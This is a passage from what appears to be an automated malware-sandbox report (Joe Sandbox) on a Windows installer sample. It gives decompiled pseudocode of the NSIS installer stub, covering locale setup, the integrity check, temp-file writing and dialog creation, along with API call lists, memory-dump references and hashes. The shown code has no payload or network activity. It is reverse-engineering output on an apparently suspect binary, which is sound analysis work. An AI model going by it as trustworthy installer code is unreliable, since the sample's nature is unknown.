                                                                                                                                                                                                                            				void _v16;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                            				short _t63;
                                                                                                                                                                                                                            				WCHAR* _t65;
                                                                                                                                                                                                                            				signed char _t69;
                                                                                                                                                                                                                            				WCHAR* _t76;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				WCHAR* _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t82 =  *0x42a270;
                                                                                                                                                                                                                            				_t22 = E00406A35(2);
                                                                                                                                                                                                                            				_t90 = _t22;
                                                                                                                                                                                                                            				if(_t22 == 0) {
                                                                                                                                                                                                                            					_t76 = 0x423748;
                                                                                                                                                                                                                            					L"1033" = 0x30;
                                                                                                                                                                                                                            					 *0x437002 = 0x78;
                                                                                                                                                                                                                            					 *0x437004 = 0;
                                                                                                                                                                                                                            					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                                                                                                                                                            					__eflags =  *0x423748;
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					lstrcatW(L"1033", _t76);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403FED(_t78, _t90);
                                                                                                                                                                                                                            				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                                                                                                                                                                            				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                                                                                                                                                                            				 *0x42a2fc = 0x10000;
                                                                                                                                                                                                                            				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					if(E0040603F(_t98, _t86) == 0) {
                                                                                                                                                                                                                            						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                                                                                                            					 *0x429248 = _t30;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                            						if(E0040140B(0) == 0) {
                                                                                                                                                                                                                            							_t32 = E00403FED(_t78, __eflags);
                                                                                                                                                                                                                            							__eflags =  *0x42a300;
                                                                                                                                                                                                                            							if( *0x42a300 != 0) {
                                                                                                                                                                                                                            								_t33 = E0040579D(_t32, 0);
                                                                                                                                                                                                                            								__eflags = _t33;
                                                                                                                                                                                                                            								if(_t33 == 0) {
                                                                                                                                                                                                                            									E0040140B(1);
                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags =  *0x42922c;
                                                                                                                                                                                                                            								if( *0x42922c == 0) {
                                                                                                                                                                                                                            									E0040140B(2);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L22;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							ShowWindow( *0x423728, 5); // executed
                                                                                                                                                                                                                            							_t39 = E004069C5("RichEd20"); // executed
                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                            							if(_t39 == 0) {
                                                                                                                                                                                                                            								E004069C5("RichEd32");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t87 = L"RichEdit20W";
                                                                                                                                                                                                                            							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                                                                                                                                                            							__eflags = _t40;
                                                                                                                                                                                                                            							if(_t40 == 0) {
                                                                                                                                                                                                                            								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                                                                                                                                                            								 *0x429224 = _t87;
                                                                                                                                                                                                                            								RegisterClassW(0x429200);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                                                                                                                                                                            							E00403C67(E0040140B(5), 1);
                                                                                                                                                                                                                            							return _t44;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                            						_t36 = 2;
                                                                                                                                                                                                                            						return _t36;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t78 =  *0x42a260;
                                                                                                                                                                                                                            						 *0x429204 = E00401000;
                                                                                                                                                                                                                            						 *0x429210 =  *0x42a260;
                                                                                                                                                                                                                            						 *0x429214 = _t30;
                                                                                                                                                                                                                            						 *0x429224 = 0x40a3b4;
                                                                                                                                                                                                                            						if(RegisterClassW(0x429200) == 0) {
                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                                                                                                                            						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t78 =  *(_t82 + 0x48);
                                                                                                                                                                                                                            					_t92 = _t78;
                                                                                                                                                                                                                            					if(_t78 == 0) {
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t76 = 0x428200;
                                                                                                                                                                                                                            					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                                                                                                                                                            					_t63 =  *0x428200; // 0x43
                                                                                                                                                                                                                            					if(_t63 == 0) {
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t63 == 0x22) {
                                                                                                                                                                                                                            						_t76 = 0x428202;
                                                                                                                                                                                                                            						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                                                                                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                            						E00406668(_t86, E00405F37(_t76));
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t69 = GetFileAttributesW(_t76);
                                                                                                                                                                                                                            						if(_t69 == 0xffffffff) {
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							E00405F83(_t76);
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t98 = _t69 & 0x00000010;
                                                                                                                                                                                                                            						if((_t69 & 0x00000010) != 0) {
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            0x00403fc4
                                                                                                                                                                                                                            0x00403fca
                                                                                                                                                                                                                            0x00403fd2
                                                                                                                                                                                                                            0x00403fd2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fca
                                                                                                                                                                                                                            0x00403f3f
                                                                                                                                                                                                                            0x00403f4a
                                                                                                                                                                                                                            0x00403f4f
                                                                                                                                                                                                                            0x00403f51
                                                                                                                                                                                                                            0x00403f58
                                                                                                                                                                                                                            0x00403f58
                                                                                                                                                                                                                            0x00403f63
                                                                                                                                                                                                                            0x00403f6b
                                                                                                                                                                                                                            0x00403f6d
                                                                                                                                                                                                                            0x00403f6f
                                                                                                                                                                                                                            0x00403f78
                                                                                                                                                                                                                            0x00403f7b
                                                                                                                                                                                                                            0x00403f81
                                                                                                                                                                                                                            0x00403f81
                                                                                                                                                                                                                            0x00403fa0
                                                                                                                                                                                                                            0x00403fb1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fb6
                                                                                                                                                                                                                            0x00403f1e
                                                                                                                                                                                                                            0x00403f20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e95
                                                                                                                                                                                                                            0x00403e95
                                                                                                                                                                                                                            0x00403ea1
                                                                                                                                                                                                                            0x00403eab
                                                                                                                                                                                                                            0x00403eb1
                                                                                                                                                                                                                            0x00403eb6
                                                                                                                                                                                                                            0x00403ec5
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00403ed4
                                                                                                                                                                                                                            0x00403f0f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403f0f
                                                                                                                                                                                                                            0x00403dcc
                                                                                                                                                                                                                            0x00403dcc
                                                                                                                                                                                                                            0x00403dcf
                                                                                                                                                                                                                            0x00403dd1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403ddf
                                                                                                                                                                                                                            0x00403df1
                                                                                                                                                                                                                            0x00403df6
                                                                                                                                                                                                                            0x00403dff
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e05
                                                                                                                                                                                                                            0x00403e07
                                                                                                                                                                                                                            0x00403e14
                                                                                                                                                                                                                            0x00403e14
                                                                                                                                                                                                                            0x00403e1d
                                                                                                                                                                                                                            0x00403e23
                                                                                                                                                                                                                            0x00403e4b
                                                                                                                                                                                                                            0x00403e53
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e35
                                                                                                                                                                                                                            0x00403e36
                                                                                                                                                                                                                            0x00403e3f
                                                                                                                                                                                                                            0x00403e45
                                                                                                                                                                                                                            0x00403e46
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e46
                                                                                                                                                                                                                            0x00403e41
                                                                                                                                                                                                                            0x00403e43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e43
                                                                                                                                                                                                                            0x00403e23

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                                                                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7620FAA0), ref: 00403E18
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                                                                                                                                                            • LoadImageW.USER32 ref: 00403E7F
                                                                                                                                                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                                                                                                                            • RegisterClassW.USER32 ref: 00403EBC
                                                                                                                                                                                                                            • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                                                                                                                                                            • CreateWindowExW.USER32 ref: 00403F09
                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                                                                                                                                            • GetClassInfoW.USER32 ref: 00403F6B
                                                                                                                                                                                                                            • GetClassInfoW.USER32 ref: 00403F78
                                                                                                                                                                                                                            • RegisterClassW.USER32 ref: 00403F81
                                                                                                                                                                                                                            • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                            • API String ID: 1975747703-2202534191
                                                                                                                                                                                                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                                                                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph (legend: • Executed, • Not Executed)
                                                                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                                                                            			E004030D0(void* __eflags, signed int _a4) {
                                                                                                                                                                                                                            				DWORD* _v8;
                                                                                                                                                                                                                            				DWORD* _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                            				short _v560;
                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				intOrPtr* _t70;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				long _t94;
                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t94 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                                                                                                                                                                            				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x400);
                                                                                                                                                                                                                            				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x80000000, 3);
                                                                                                                                                                                                                            				 *0x40a018 = _t106;
                                                                                                                                                                                                                            				if(_t106 == 0xffffffff) {
                                                                                                                                                                                                                            					return L"Error launching installer";
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe");
                                                                                                                                                                                                                            				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
                                                                                                                                                                                                                            				_t54 = GetFileSize(_t106, 0);
                                                                                                                                                                                                                            				__eflags = _t54;
                                                                                                                                                                                                                            				 *0x420f00 = _t54;
                                                                                                                                                                                                                            				_t110 = _t54;
                                                                                                                                                                                                                            				if(_t54 <= 0) {
                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                            					E0040302E(1);
                                                                                                                                                                                                                            					__eflags =  *0x42a274 - _t94;
                                                                                                                                                                                                                            					if( *0x42a274 == _t94) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _v12 - _t94;
                                                                                                                                                                                                                            					if(_v12 == _t94) {
                                                                                                                                                                                                                            						L28:
                                                                                                                                                                                                                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                                                                                                                            						_t111 = _t57;
                                                                                                                                                                                                                            						E00406B90(0x40ce68);
                                                                                                                                                                                                                            						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                                                                                                                                                                                            						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                                                                                                                                                            						__eflags = _t62 - 0xffffffff;
                                                                                                                                                                                                                            						 *0x40a01c = _t62;
                                                                                                                                                                                                                            						if(_t62 != 0xffffffff) {
                                                                                                                                                                                                                            							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                                                                                                                                                                            							 *0x420f04 = _t65;
                                                                                                                                                                                                                            							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                                                                                                                            							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                                                                                                                                                            							__eflags = _t68 - _v20;
                                                                                                                                                                                                                            							if(_t68 == _v20) {
                                                                                                                                                                                                                            								__eflags = _v40 & 0x00000001;
                                                                                                                                                                                                                            								 *0x42a270 = _t111;
                                                                                                                                                                                                                            								 *0x42a278 =  *_t111;
                                                                                                                                                                                                                            								if((_v40 & 0x00000001) != 0) {
                                                                                                                                                                                                                            									 *0x42a27c =  *0x42a27c + 1;
                                                                                                                                                                                                                            									__eflags =  *0x42a27c;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t45 = _t111 + 0x44; // 0x44
                                                                                                                                                                                                                            								_t70 = _t45;
                                                                                                                                                                                                                            								_t102 = 8;
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									_t70 = _t70 - 8;
                                                                                                                                                                                                                            									 *_t70 =  *_t70 + _t111;
                                                                                                                                                                                                                            									_t102 = _t102 - 1;
                                                                                                                                                                                                                            									__eflags = _t102;
                                                                                                                                                                                                                            								} while (_t102 != 0);
                                                                                                                                                                                                                            								_t71 =  *0x420ef4; // 0x66cde
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                                                                                                                                                                                            								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E004035F8( *0x420ef0);
                                                                                                                                                                                                                            					_t77 = E004035E2( &_a4, 4);
                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _v8 - _a4;
                                                                                                                                                                                                                            					if(_v8 != _a4) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L28;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t107 = _t110;
                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                            						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
			__eflags = _t110 - _t82;
			if(_t110 >= _t82) {
				_t107 = _t82;
			}
			_t83 = E004035E2(0x418ef0, _t107);
			__eflags = _t83;
			if(_t83 == 0) {
				E0040302E(1);
				L32:
				return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
			}
			__eflags =  *0x42a274;
			if( *0x42a274 != 0) {
				__eflags = _a4 & 0x00000002;
				if((_a4 & 0x00000002) == 0) {
					E0040302E(0);
				}
				goto L20;
			}
			E00406113( &_v40, 0x418ef0, 0x1c);
			_t89 = _v40;
			__eflags = _t89 & 0xfffffff0;
			if((_t89 & 0xfffffff0) != 0) {
				goto L20;
			}
			__eflags = _v36 - 0xdeadbeef;
			if(_v36 != 0xdeadbeef) {
				goto L20;
			}
			__eflags = _v24 - 0x74736e49;
			if(_v24 != 0x74736e49) {
				goto L20;
			}
			__eflags = _v28 - 0x74666f73;
			if(_v28 != 0x74666f73) {
				goto L20;
			}
			__eflags = _v32 - 0x6c6c754e;
			if(_v32 != 0x6c6c754e) {
				goto L20;
			}
			_a4 = _a4 | _t89;
			_t104 =  *0x420ef0; // 0x5cd09
			 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
			_t92 = _v16;
			__eflags = _t92 - _t110;
			 *0x42a274 = _t104;
			if(_t92 > _t110) {
				goto L32;
			}
			__eflags = _a4 & 0x00000008;
			if((_a4 & 0x00000008) != 0) {
				L16:
				_v12 = _v12 + 1;
				_t110 = _t92 - 4;
				__eflags = _t107 - _t110;
				if(_t107 > _t110) {
					_t107 = _t110;
				}
				goto L20;
			}
			__eflags = _a4 & 0x00000004;
			if((_a4 & 0x00000004) != 0) {
				break;
			}
			goto L16;
			L20:
			__eflags = _t110 -  *0x420f00; // 0x5cfce
			if(__eflags < 0) {
				_v8 = E00406B22(_v8, 0x418ef0, _t107);
			}
			 *0x420ef0 =  *0x420ef0 + _t107;
			_t110 = _t110 - _t107;
			__eflags = _t110;
		} while (_t110 != 0);
		_t94 = 0;
		__eflags = 0;
		goto L24;
	}
}
































                                                                                                                                                                                                                            0x0040327d
                                                                                                                                                                                                                            0x00403280
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040315e
                                                                                                                                                                                                                            0x00403163
                                                                                                                                                                                                                            0x00403168
                                                                                                                                                                                                                            0x0040316c
                                                                                                                                                                                                                            0x00403173
                                                                                                                                                                                                                            0x00403178
                                                                                                                                                                                                                            0x0040317a
                                                                                                                                                                                                                            0x0040317c
                                                                                                                                                                                                                            0x0040317c
                                                                                                                                                                                                                            0x00403180
                                                                                                                                                                                                                            0x00403185
                                                                                                                                                                                                                            0x00403187
                                                                                                                                                                                                                            0x004032e0
                                                                                                                                                                                                                            0x00403322
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403322
                                                                                                                                                                                                                            0x0040318d
                                                                                                                                                                                                                            0x00403194
                                                                                                                                                                                                                            0x00403210
                                                                                                                                                                                                                            0x00403214
                                                                                                                                                                                                                            0x00403218
                                                                                                                                                                                                                            0x0040321d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403214
                                                                                                                                                                                                                            0x0040319d
                                                                                                                                                                                                                            0x004031a2
                                                                                                                                                                                                                            0x004031a5
                                                                                                                                                                                                                            0x004031aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031ac
                                                                                                                                                                                                                            0x004031b3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031b5
                                                                                                                                                                                                                            0x004031bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031be
                                                                                                                                                                                                                            0x004031c5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031c7
                                                                                                                                                                                                                            0x004031ce
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031d0
                                                                                                                                                                                                                            0x004031d6
                                                                                                                                                                                                                            0x004031df
                                                                                                                                                                                                                            0x004031e5
                                                                                                                                                                                                                            0x004031e8
                                                                                                                                                                                                                            0x004031ea
                                                                                                                                                                                                                            0x004031f0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004031f6
                                                                                                                                                                                                                            0x004031fa
                                                                                                                                                                                                                            0x00403202
                                                                                                                                                                                                                            0x00403202
                                                                                                                                                                                                                            0x00403205
                                                                                                                                                                                                                            0x00403208
                                                                                                                                                                                                                            0x0040320a
                                                                                                                                                                                                                            0x0040320c
                                                                                                                                                                                                                            0x0040320c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040320a
                                                                                                                                                                                                                            0x004031fc
                                                                                                                                                                                                                            0x00403200
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040321e
                                                                                                                                                                                                                            0x0040321e
                                                                                                                                                                                                                            0x00403224
                                                                                                                                                                                                                            0x00403230
                                                                                                                                                                                                                            0x00403230
                                                                                                                                                                                                                            0x00403233
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403239
                                                                                                                                                                                                                            0x00403241
                                                                                                                                                                                                                            0x00403241
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403241

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_uniformerede.exe,00000400), ref: 00403100
                                                                                                                                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00403149
                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
